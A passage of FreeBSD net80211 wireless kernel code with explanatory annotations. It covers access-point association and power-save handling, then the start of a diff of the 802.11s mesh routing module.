IEEE80211_RATE_BASIC) { ratesetmismatch(ni, wh, reassoc, resp, "legacy", rate); vap->iv_stats.is_rx_assoc_norate++; return; } /* * If constrained to 11g-only stations reject an * 11b-only station. We cheat a bit here by looking * at the max negotiated xmit rate and assuming anyone * with a best rate <24Mb/s is an 11b station. */ if ((vap->iv_flags & IEEE80211_F_PUREG) && rate < 48) { ratesetmismatch(ni, wh, reassoc, resp, "11g", rate); vap->iv_stats.is_rx_assoc_norate++; return; } /* * Do HT rate set handling and setup HT node state. */ ni->ni_chan = vap->iv_bss->ni_chan; if (IEEE80211_IS_CHAN_HT(ni->ni_chan) && htcap != NULL) { rate = ieee80211_setup_htrates(ni, htcap, IEEE80211_F_DOFMCS | IEEE80211_F_DONEGO | IEEE80211_F_DOBRS); if (rate & IEEE80211_RATE_BASIC) { ratesetmismatch(ni, wh, reassoc, resp, "HT", rate); vap->iv_stats.is_ht_assoc_norate++; return; } ieee80211_ht_node_init(ni); ieee80211_ht_updatehtcap(ni, htcap); } else if (ni->ni_flags & IEEE80211_NODE_HT) ieee80211_ht_node_cleanup(ni); #ifdef IEEE80211_SUPPORT_SUPERG else if (ni->ni_ath_flags & IEEE80211_NODE_ATH) ieee80211_ff_node_cleanup(ni); #endif /* * Allow AMPDU operation only with unencrypted traffic * or AES-CCM; the 11n spec only specifies these ciphers * so permitting any others is undefined and can lead * to interoperability problems. 
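Rates in the (re)association handling are carried in 500 kb/s units, which is why the 11g-only test above treats a best negotiated rate below 48 (that is, below 24 Mb/s) as an 11b-class station, and why is11bclient() earlier builds its bitmap from the codes 2, 4, 11 and 22. A small conversion example:

    #include <stdio.h>

    #define RATE_VAL 0x7f   /* low 7 bits: rate in 500 kb/s units */

    static int
    rate_code_to_kbps(int code)
    {
        return (code & RATE_VAL) * 500;
    }

    int
    main(void)
    {
        printf("code 48 -> %d kb/s\n", rate_code_to_kbps(48)); /* 24000 */
        printf("code 22 -> %d kb/s\n", rate_code_to_kbps(22)); /* 11000 */
        printf("code 11 -> %d kb/s\n", rate_code_to_kbps(11)); /*  5500 */
        return 0;
    }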
*/ if ((ni->ni_flags & IEEE80211_NODE_HT) && (((vap->iv_flags & IEEE80211_F_WPA) && rsnparms.rsn_ucastcipher != IEEE80211_CIPHER_AES_CCM) || (vap->iv_flags & (IEEE80211_F_WPA|IEEE80211_F_PRIVACY)) == IEEE80211_F_PRIVACY)) { IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_11N, ni, "disallow HT use because WEP or TKIP requested, " "capinfo 0x%x ucastcipher %d", capinfo, rsnparms.rsn_ucastcipher); ieee80211_ht_node_cleanup(ni); vap->iv_stats.is_ht_assoc_downgrade++; } /* * If constrained to 11n-only stations reject legacy stations. */ if ((vap->iv_flags_ht & IEEE80211_FHT_PUREN) && (ni->ni_flags & IEEE80211_NODE_HT) == 0) { htcapmismatch(ni, wh, reassoc, resp); vap->iv_stats.is_ht_assoc_nohtcap++; return; } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; ni->ni_intval = lintval; ni->ni_capinfo = capinfo; ni->ni_fhdwell = vap->iv_bss->ni_fhdwell; ni->ni_fhindex = vap->iv_bss->ni_fhindex; /* * Store the IEs. * XXX maybe better to just expand */ if (ieee80211_ies_init(&ni->ni_ies, sfrm, efrm - sfrm)) { #define setie(_ie, _off) ieee80211_ies_setie(ni->ni_ies, _ie, _off) if (wpa != NULL) setie(wpa_ie, wpa - sfrm); if (rsn != NULL) setie(rsn_ie, rsn - sfrm); if (htcap != NULL) setie(htcap_ie, htcap - sfrm); if (wme != NULL) { setie(wme_ie, wme - sfrm); /* * Mark node as capable of QoS. */ ni->ni_flags |= IEEE80211_NODE_QOS; } else ni->ni_flags &= ~IEEE80211_NODE_QOS; #ifdef IEEE80211_SUPPORT_SUPERG if (ath != NULL) { setie(ath_ie, ath - sfrm); /* * Parse ATH station parameters. */ ieee80211_parse_ath(ni, ni->ni_ies.ath_ie); } else #endif ni->ni_ath_flags = 0; #undef setie } else { ni->ni_flags &= ~IEEE80211_NODE_QOS; ni->ni_ath_flags = 0; } ieee80211_node_join(ni, resp); ieee80211_deliver_l2uf(ni); break; } case IEEE80211_FC0_SUBTYPE_DEAUTH: case IEEE80211_FC0_SUBTYPE_DISASSOC: { uint16_t reason; if (vap->iv_state != IEEE80211_S_RUN || /* NB: can happen when in promiscuous mode */ !IEEE80211_ADDR_EQ(wh->i_addr1, vap->iv_myaddr)) { vap->iv_stats.is_rx_mgtdiscard++; break; } /* * deauth/disassoc frame format * [2] reason */ IEEE80211_VERIFY_LENGTH(efrm - frm, 2, return); reason = le16toh(*(uint16_t *)frm); if (subtype == IEEE80211_FC0_SUBTYPE_DEAUTH) { vap->iv_stats.is_rx_deauth++; IEEE80211_NODE_STAT(ni, rx_deauth); } else { vap->iv_stats.is_rx_disassoc++; IEEE80211_NODE_STAT(ni, rx_disassoc); } IEEE80211_NOTE(vap, IEEE80211_MSG_AUTH, ni, "recv %s (reason %d)", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], reason); if (ni != vap->iv_bss) ieee80211_node_leave(ni); break; } case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "unknown node"); vap->iv_stats.is_rx_mgtdiscard++; } else if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_ATIM: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, 
"mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } static void hostap_recv_ctl(struct ieee80211_node *ni, struct mbuf *m, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_PS_POLL: ni->ni_vap->iv_recv_pspoll(ni, m); break; case IEEE80211_FC0_SUBTYPE_BAR: ieee80211_recv_bar(ni, m); break; } } /* * Process a received ps-poll frame. */ void ieee80211_recv_pspoll(struct ieee80211_node *ni, struct mbuf *m0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_frame_min *wh; struct mbuf *m; uint16_t aid; int qlen; wh = mtod(m0, struct ieee80211_frame_min *); if (ni->ni_associd == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_POWER | IEEE80211_MSG_DEBUG, (struct ieee80211_frame *) wh, NULL, "%s", "unassociated station"); vap->iv_stats.is_ps_unassoc++; IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DEAUTH, IEEE80211_REASON_NOT_ASSOCED); return; } aid = le16toh(*(uint16_t *)wh->i_dur); if (aid != ni->ni_associd) { IEEE80211_DISCARD(vap, IEEE80211_MSG_POWER | IEEE80211_MSG_DEBUG, (struct ieee80211_frame *) wh, NULL, "aid mismatch: sta aid 0x%x poll aid 0x%x", ni->ni_associd, aid); vap->iv_stats.is_ps_badaid++; /* * NB: We used to deauth the station but it turns out * the Blackberry Curve 8230 (and perhaps other devices) * sometimes send the wrong AID when WME is negotiated. * Being more lenient here seems ok as we already check * the station is associated and we only return frames * queued for the station (i.e. we don't use the AID). */ return; } /* Okay, take the first queued packet and put it out... */ m = ieee80211_node_psq_dequeue(ni, &qlen); if (m == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_POWER, wh->i_addr2, "%s", "recv ps-poll, but queue empty"); ieee80211_send_nulldata(ieee80211_ref_node(ni)); vap->iv_stats.is_ps_qempty++; /* XXX node stat */ if (vap->iv_set_tim != NULL) vap->iv_set_tim(ni, 0); /* just in case */ return; } /* * If there are more packets, set the more packets bit * in the packet dispatched to the station; otherwise * turn off the TIM bit. */ if (qlen != 0) { IEEE80211_NOTE(vap, IEEE80211_MSG_POWER, ni, "recv ps-poll, send packet, %u still queued", qlen); m->m_flags |= M_MORE_DATA; } else { IEEE80211_NOTE(vap, IEEE80211_MSG_POWER, ni, "%s", "recv ps-poll, send packet, queue empty"); if (vap->iv_set_tim != NULL) vap->iv_set_tim(ni, 0); } m->m_flags |= M_PWR_SAV; /* bypass PS handling */ /* * Do the right thing; if it's an encap'ed frame then * call ieee80211_parent_xmitpkt() (and free the ref) else * call ieee80211_vap_xmitpkt(). */ if (m->m_flags & M_ENCAP) { if (ieee80211_parent_xmitpkt(ic, m) != 0) ieee80211_free_node(ni); } else { (void) ieee80211_vap_xmitpkt(vap, m); } } diff --git a/sys/net80211/ieee80211_mesh.c b/sys/net80211/ieee80211_mesh.c index d18483ea0565..4aff6bd51689 100644 --- a/sys/net80211/ieee80211_mesh.c +++ b/sys/net80211/ieee80211_mesh.c @@ -1,3635 +1,3635 @@ /*- * Copyright (c) 2009 The FreeBSD Foundation * All rights reserved. * * This software was developed by Rui Paulo under sponsorship from the * FreeBSD Foundation. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. 
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11s Mesh Point (MBSS) support. * * Based on March 2009, D3.0 802.11s draft spec. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #include #include static void mesh_rt_flush_invalid(struct ieee80211vap *); static int mesh_select_proto_path(struct ieee80211vap *, const char *); static int mesh_select_proto_metric(struct ieee80211vap *, const char *); static void mesh_vattach(struct ieee80211vap *); static int mesh_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void mesh_rt_cleanup_cb(void *); static void mesh_gatemode_setup(struct ieee80211vap *); static void mesh_gatemode_cb(void *); static void mesh_linkchange(struct ieee80211_node *, enum ieee80211_mesh_mlstate); static void mesh_checkid(void *, struct ieee80211_node *); static uint32_t mesh_generateid(struct ieee80211vap *); static int mesh_checkpseq(struct ieee80211vap *, const uint8_t [IEEE80211_ADDR_LEN], uint32_t); static void mesh_transmit_to_gate(struct ieee80211vap *, struct mbuf *, struct ieee80211_mesh_route *); static void mesh_forward(struct ieee80211vap *, struct mbuf *, const struct ieee80211_meshcntl *); static int mesh_input(struct ieee80211_node *, struct mbuf *, int, int); static void mesh_recv_mgmt(struct ieee80211_node *, struct mbuf *, int, int, int); static void mesh_recv_ctl(struct ieee80211_node *, struct mbuf *, int); static void mesh_peer_timeout_setup(struct ieee80211_node *); static void mesh_peer_timeout_backoff(struct ieee80211_node *); static void mesh_peer_timeout_cb(void *); static __inline void mesh_peer_timeout_stop(struct ieee80211_node *); static int mesh_verify_meshid(struct ieee80211vap *, const uint8_t *); static int mesh_verify_meshconf(struct ieee80211vap *, const uint8_t *); static int mesh_verify_meshpeer(struct ieee80211vap *, uint8_t, const uint8_t *); uint32_t mesh_airtime_calc(struct ieee80211_node *); /* * Timeout values come from the specification and are in milliseconds. 
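The mesh timeouts below are exposed in milliseconds but armed as kernel ticks by the ieee80211_sysctl_msecs_ticks handlers. A tiny user-space model of that conversion; hz is a parameter here, whereas in the kernel it is the global tick rate.

    static int
    msecs_to_ticks_model(int msecs, int hz)
    {
        /* round up so a non-zero timeout never becomes zero ticks */
        return (msecs * hz + 999) / 1000;
    }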
*/ static SYSCTL_NODE(_net_wlan, OID_AUTO, mesh, CTLFLAG_RD, 0, "IEEE 802.11s parameters"); static int ieee80211_mesh_gateint = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, gateint, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_gateint, 0, ieee80211_sysctl_msecs_ticks, "I", "mesh gate interval (ms)"); static int ieee80211_mesh_retrytimeout = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, retrytimeout, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_retrytimeout, 0, ieee80211_sysctl_msecs_ticks, "I", "Retry timeout (msec)"); static int ieee80211_mesh_holdingtimeout = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, holdingtimeout, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_holdingtimeout, 0, ieee80211_sysctl_msecs_ticks, "I", "Holding state timeout (msec)"); static int ieee80211_mesh_confirmtimeout = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, confirmtimeout, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_confirmtimeout, 0, ieee80211_sysctl_msecs_ticks, "I", "Confirm state timeout (msec)"); static int ieee80211_mesh_backofftimeout = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, backofftimeout, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_backofftimeout, 0, ieee80211_sysctl_msecs_ticks, "I", "Backoff timeout (msec). This is to throutles peering forever when " "not receving answer or is rejected by a neighbor"); static int ieee80211_mesh_maxretries = 2; SYSCTL_INT(_net_wlan_mesh, OID_AUTO, maxretries, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_maxretries, 0, "Maximum retries during peer link establishment"); static int ieee80211_mesh_maxholding = 2; SYSCTL_INT(_net_wlan_mesh, OID_AUTO, maxholding, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_maxholding, 0, "Maximum times we are allowed to transition to HOLDING state before " "backinoff during peer link establishment"); static const uint8_t broadcastaddr[IEEE80211_ADDR_LEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; static ieee80211_recv_action_func mesh_recv_action_meshpeering_open; static ieee80211_recv_action_func mesh_recv_action_meshpeering_confirm; static ieee80211_recv_action_func mesh_recv_action_meshpeering_close; static ieee80211_recv_action_func mesh_recv_action_meshlmetric; static ieee80211_recv_action_func mesh_recv_action_meshgate; static ieee80211_send_action_func mesh_send_action_meshpeering_open; static ieee80211_send_action_func mesh_send_action_meshpeering_confirm; static ieee80211_send_action_func mesh_send_action_meshpeering_close; static ieee80211_send_action_func mesh_send_action_meshlmetric; static ieee80211_send_action_func mesh_send_action_meshgate; static const struct ieee80211_mesh_proto_metric mesh_metric_airtime = { .mpm_descr = "AIRTIME", .mpm_ie = IEEE80211_MESHCONF_METRIC_AIRTIME, .mpm_metric = mesh_airtime_calc, }; static struct ieee80211_mesh_proto_path mesh_proto_paths[4]; static struct ieee80211_mesh_proto_metric mesh_proto_metrics[4]; #define RT_ENTRY_LOCK(rt) mtx_lock(&(rt)->rt_lock) #define RT_ENTRY_LOCK_ASSERT(rt) mtx_assert(&(rt)->rt_lock, MA_OWNED) #define RT_ENTRY_UNLOCK(rt) mtx_unlock(&(rt)->rt_lock) #define MESH_RT_LOCK(ms) mtx_lock(&(ms)->ms_rt_lock) #define MESH_RT_LOCK_ASSERT(ms) mtx_assert(&(ms)->ms_rt_lock, MA_OWNED) #define MESH_RT_UNLOCK(ms) mtx_unlock(&(ms)->ms_rt_lock) MALLOC_DEFINE(M_80211_MESH_PREQ, "80211preq", "802.11 MESH Path Request frame"); MALLOC_DEFINE(M_80211_MESH_PREP, "80211prep", "802.11 MESH Path Reply frame"); MALLOC_DEFINE(M_80211_MESH_PERR, "80211perr", "802.11 MESH Path Error frame"); /* The longer one of the lifetime should be stored as new lifetime */ #define MESH_ROUTE_LIFETIME_MAX(a, b) (a > b ? 
a : b) MALLOC_DEFINE(M_80211_MESH_RT, "80211mesh_rt", "802.11s routing table"); MALLOC_DEFINE(M_80211_MESH_GT_RT, "80211mesh_gt", "802.11s known gates table"); /* * Helper functions to manipulate the Mesh routing table. */ static struct ieee80211_mesh_route * mesh_rt_find_locked(struct ieee80211_mesh_state *ms, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_route *rt; MESH_RT_LOCK_ASSERT(ms); TAILQ_FOREACH(rt, &ms->ms_routes, rt_next) { if (IEEE80211_ADDR_EQ(dest, rt->rt_dest)) return rt; } return NULL; } static struct ieee80211_mesh_route * mesh_rt_add_locked(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; KASSERT(!IEEE80211_ADDR_EQ(broadcastaddr, dest), ("%s: adding broadcast to the routing table", __func__)); MESH_RT_LOCK_ASSERT(ms); rt = malloc(ALIGN(sizeof(struct ieee80211_mesh_route)) + ms->ms_ppath->mpp_privlen, M_80211_MESH_RT, M_NOWAIT | M_ZERO); if (rt != NULL) { rt->rt_vap = vap; IEEE80211_ADDR_COPY(rt->rt_dest, dest); rt->rt_priv = (void *)ALIGN(&rt[1]); mtx_init(&rt->rt_lock, "MBSS_RT", "802.11s route entry", MTX_DEF); callout_init(&rt->rt_discovery, CALLOUT_MPSAFE); rt->rt_updtime = ticks; /* create time */ TAILQ_INSERT_TAIL(&ms->ms_routes, rt, rt_next); } return rt; } struct ieee80211_mesh_route * ieee80211_mesh_rt_find(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; MESH_RT_LOCK(ms); rt = mesh_rt_find_locked(ms, dest); MESH_RT_UNLOCK(ms); return rt; } struct ieee80211_mesh_route * ieee80211_mesh_rt_add(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; KASSERT(ieee80211_mesh_rt_find(vap, dest) == NULL, ("%s: duplicate entry in the routing table", __func__)); KASSERT(!IEEE80211_ADDR_EQ(vap->iv_myaddr, dest), ("%s: adding self to the routing table", __func__)); MESH_RT_LOCK(ms); rt = mesh_rt_add_locked(vap, dest); MESH_RT_UNLOCK(ms); return rt; } /* * Update the route lifetime and returns the updated lifetime. * If new_lifetime is zero and route is timedout it will be invalidated. * new_lifetime is in msec */ int ieee80211_mesh_rt_update(struct ieee80211_mesh_route *rt, int new_lifetime) { int timesince, now; uint32_t lifetime = 0; KASSERT(rt != NULL, ("route is NULL")); now = ticks; RT_ENTRY_LOCK(rt); /* dont clobber a proxy entry gated by us */ if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY && rt->rt_nhops == 0) { RT_ENTRY_UNLOCK(rt); return rt->rt_lifetime; } timesince = ticks_to_msecs(now - rt->rt_updtime); rt->rt_updtime = now; if (timesince >= rt->rt_lifetime) { if (new_lifetime != 0) { rt->rt_lifetime = new_lifetime; } else { rt->rt_flags &= ~IEEE80211_MESHRT_FLAGS_VALID; rt->rt_lifetime = 0; } } else { /* update what is left of lifetime */ rt->rt_lifetime = rt->rt_lifetime - timesince; rt->rt_lifetime = MESH_ROUTE_LIFETIME_MAX( new_lifetime, rt->rt_lifetime); } lifetime = rt->rt_lifetime; RT_ENTRY_UNLOCK(rt); return lifetime; } /* * Add a proxy route (as needed) for the specified destination. 
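ieee80211_mesh_rt_update() above folds the elapsed time into the stored lifetime and keeps the longer of the remaining and the newly offered lifetime, invalidating the route only when it has already expired and no new lifetime was supplied. A simplified, lock-free model of that arithmetic:

    #include <stdint.h>

    /* All values in milliseconds; a return of 0 means the route is invalid. */
    static uint32_t
    rt_lifetime_update(uint32_t lifetime, uint32_t elapsed, uint32_t new_lifetime)
    {
        if (elapsed >= lifetime)
            return new_lifetime;    /* expired: adopt new value, 0 invalidates */
        lifetime -= elapsed;
        return new_lifetime > lifetime ? new_lifetime : lifetime;
    }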
*/ void ieee80211_mesh_proxy_check(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; MESH_RT_LOCK(ms); rt = mesh_rt_find_locked(ms, dest); if (rt == NULL) { rt = mesh_rt_add_locked(vap, dest); if (rt == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s", "unable to add proxy entry"); vap->iv_stats.is_mesh_rtaddfailed++; } else { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s", "add proxy entry"); IEEE80211_ADDR_COPY(rt->rt_mesh_gate, vap->iv_myaddr); IEEE80211_ADDR_COPY(rt->rt_nexthop, vap->iv_myaddr); rt->rt_flags |= IEEE80211_MESHRT_FLAGS_VALID | IEEE80211_MESHRT_FLAGS_PROXY; } } else if ((rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) { KASSERT(rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY, ("no proxy flag for poxy entry")); struct ieee80211com *ic = vap->iv_ic; /* * Fix existing entry created by received frames from * stations that have some memory of dest. We also * flush any frames held on the staging queue; delivering * them is too much trouble right now. */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s", "fix proxy entry"); IEEE80211_ADDR_COPY(rt->rt_nexthop, vap->iv_myaddr); rt->rt_flags |= IEEE80211_MESHRT_FLAGS_VALID | IEEE80211_MESHRT_FLAGS_PROXY; /* XXX belongs in hwmp */ ieee80211_ageq_drain_node(&ic->ic_stageq, (void *)(uintptr_t) ieee80211_mac_hash(ic, dest)); /* XXX stat? */ } MESH_RT_UNLOCK(ms); } static __inline void mesh_rt_del(struct ieee80211_mesh_state *ms, struct ieee80211_mesh_route *rt) { TAILQ_REMOVE(&ms->ms_routes, rt, rt_next); /* * Grab the lock before destroying it, to be sure no one else * is holding the route. */ RT_ENTRY_LOCK(rt); callout_drain(&rt->rt_discovery); mtx_destroy(&rt->rt_lock); free(rt, M_80211_MESH_RT); } void ieee80211_mesh_rt_del(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt, *next; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(rt, &ms->ms_routes, rt_next, next) { if (IEEE80211_ADDR_EQ(rt->rt_dest, dest)) { if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) { ms->ms_ppath->mpp_senderror(vap, dest, rt, IEEE80211_REASON_MESH_PERR_NO_PROXY); } else { ms->ms_ppath->mpp_senderror(vap, dest, rt, IEEE80211_REASON_MESH_PERR_DEST_UNREACH); } mesh_rt_del(ms, rt); MESH_RT_UNLOCK(ms); return; } } MESH_RT_UNLOCK(ms); } void ieee80211_mesh_rt_flush(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt, *next; if (ms == NULL) return; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(rt, &ms->ms_routes, rt_next, next) mesh_rt_del(ms, rt); MESH_RT_UNLOCK(ms); } void ieee80211_mesh_rt_flush_peer(struct ieee80211vap *vap, const uint8_t peer[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt, *next; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(rt, &ms->ms_routes, rt_next, next) { if (IEEE80211_ADDR_EQ(rt->rt_nexthop, peer)) mesh_rt_del(ms, rt); } MESH_RT_UNLOCK(ms); } /* * Flush expired routing entries, i.e. those in invalid state for * some time. 
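 *
 * This runs from mesh_rt_cleanup_cb(), which rearms ms_cleantimer
 * every ms_ppath->mpp_inact ticks while the vap is running.  Entries
 * flagged IEEE80211_MESHRT_FLAGS_DISCOVER are skipped because their
 * discovery callout tears them down itself; for the rest, calling
 * ieee80211_mesh_rt_update() with a new lifetime of 0 clears the
 * VALID flag once the remaining lifetime has expired, and the entry
 * is then removed.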
*/ static void mesh_rt_flush_invalid(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt, *next; if (ms == NULL) return; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(rt, &ms->ms_routes, rt_next, next) { /* Discover paths will be deleted by their own callout */ if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_DISCOVER) continue; ieee80211_mesh_rt_update(rt, 0); if ((rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) mesh_rt_del(ms, rt); } MESH_RT_UNLOCK(ms); } #define N(a) (sizeof(a) / sizeof(a[0])) int ieee80211_mesh_register_proto_path(const struct ieee80211_mesh_proto_path *mpp) { int i, firstempty = -1; for (i = 0; i < N(mesh_proto_paths); i++) { if (strncmp(mpp->mpp_descr, mesh_proto_paths[i].mpp_descr, IEEE80211_MESH_PROTO_DSZ) == 0) return EEXIST; if (!mesh_proto_paths[i].mpp_active && firstempty == -1) firstempty = i; } if (firstempty < 0) return ENOSPC; memcpy(&mesh_proto_paths[firstempty], mpp, sizeof(*mpp)); mesh_proto_paths[firstempty].mpp_active = 1; return 0; } int ieee80211_mesh_register_proto_metric(const struct ieee80211_mesh_proto_metric *mpm) { int i, firstempty = -1; for (i = 0; i < N(mesh_proto_metrics); i++) { if (strncmp(mpm->mpm_descr, mesh_proto_metrics[i].mpm_descr, IEEE80211_MESH_PROTO_DSZ) == 0) return EEXIST; if (!mesh_proto_metrics[i].mpm_active && firstempty == -1) firstempty = i; } if (firstempty < 0) return ENOSPC; memcpy(&mesh_proto_metrics[firstempty], mpm, sizeof(*mpm)); mesh_proto_metrics[firstempty].mpm_active = 1; return 0; } static int mesh_select_proto_path(struct ieee80211vap *vap, const char *name) { struct ieee80211_mesh_state *ms = vap->iv_mesh; int i; for (i = 0; i < N(mesh_proto_paths); i++) { if (strcasecmp(mesh_proto_paths[i].mpp_descr, name) == 0) { ms->ms_ppath = &mesh_proto_paths[i]; return 0; } } return ENOENT; } static int mesh_select_proto_metric(struct ieee80211vap *vap, const char *name) { struct ieee80211_mesh_state *ms = vap->iv_mesh; int i; for (i = 0; i < N(mesh_proto_metrics); i++) { if (strcasecmp(mesh_proto_metrics[i].mpm_descr, name) == 0) { ms->ms_pmetric = &mesh_proto_metrics[i]; return 0; } } return ENOENT; } #undef N static void mesh_gatemode_setup(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; /* * NB: When a mesh gate is running as a ROOT it shall * not send out periodic GANNs but instead mark the * mesh gate flag for the corresponding proactive PREQ * and RANN frames. */ if (ms->ms_flags & IEEE80211_MESHFLAGS_ROOT || (ms->ms_flags & IEEE80211_MESHFLAGS_GATE) == 0) { callout_drain(&ms->ms_gatetimer); return ; } callout_reset(&ms->ms_gatetimer, ieee80211_mesh_gateint, mesh_gatemode_cb, vap); } static void mesh_gatemode_cb(void *arg) { struct ieee80211vap *vap = (struct ieee80211vap *)arg; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_meshgann_ie gann; gann.gann_flags = 0; /* Reserved */ gann.gann_hopcount = 0; gann.gann_ttl = ms->ms_ttl; IEEE80211_ADDR_COPY(gann.gann_addr, vap->iv_myaddr); gann.gann_seq = ms->ms_gateseq++; gann.gann_interval = ieee80211_mesh_gateint; IEEE80211_NOTE(vap, IEEE80211_MSG_MESH, vap->iv_bss, "send broadcast GANN (seq %u)", gann.gann_seq); ieee80211_send_action(vap->iv_bss, IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_GANN, &gann); mesh_gatemode_setup(vap); } static void ieee80211_mesh_init(void) { memset(mesh_proto_paths, 0, sizeof(mesh_proto_paths)); memset(mesh_proto_metrics, 0, sizeof(mesh_proto_metrics)); /* * Setup mesh parameters that depends on the clock frequency. 
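 *
 * The tunables above are declared as -1 and only filled in here
 * because msecs_to_ticks() depends on the runtime value of hz, so the
 * defaults cannot be compile-time initializers; the sysctl handler
 * ieee80211_sysctl_msecs_ticks translates between milliseconds and
 * ticks when they are read or written.  The 40 ms retry default, for
 * instance, is stored as:
 *
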